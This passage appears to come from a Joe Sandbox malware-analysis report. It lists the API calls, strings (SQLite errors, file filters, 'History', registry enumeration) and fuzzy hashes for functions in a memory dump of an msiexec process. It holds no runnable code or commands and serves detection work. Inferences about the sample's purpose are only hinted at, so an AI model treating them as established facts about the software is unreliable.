                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFilefreememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2507021081-0
                                                                                                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                • free.MSVCRT ref: 00417544
                                                                                                                                                • free.MSVCRT ref: 00417562
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4131324427-0
                                                                                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PathTemp$free
                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                • API String ID: 924794160-1420421710
                                                                                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                • API String ID: 0-1953309616
                                                                                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1265369119-0
                                                                                                                                                • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                • free.MSVCRT ref: 0040E9D3
                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                • free.MSVCRT ref: 004174E4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4053608372-0
                                                                                                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
• Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
• ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
• memset.MSVCRT ref: 004450CD
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
• CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• API String ID: 1471605966-0
• Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
• Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
• Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
• Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
APIs
• wcscpy.MSVCRT ref: 0044475F
• wcscat.MSVCRT ref: 0044476E
• wcscat.MSVCRT ref: 0044477F
• wcscat.MSVCRT ref: 0044478E
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 102104167-2245444037
• Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
• Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
• Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
• Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
• Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
• Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
• Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: _memicmpwcslen
• String ID: @@@@$History
• API String ID: 1872909662-685208920
• Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
• Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
• Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
• Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
• Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
• Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
• Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
• Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
• Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
• Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
• Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
• Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
• Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
• Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
• Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
• Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
• Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
• Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
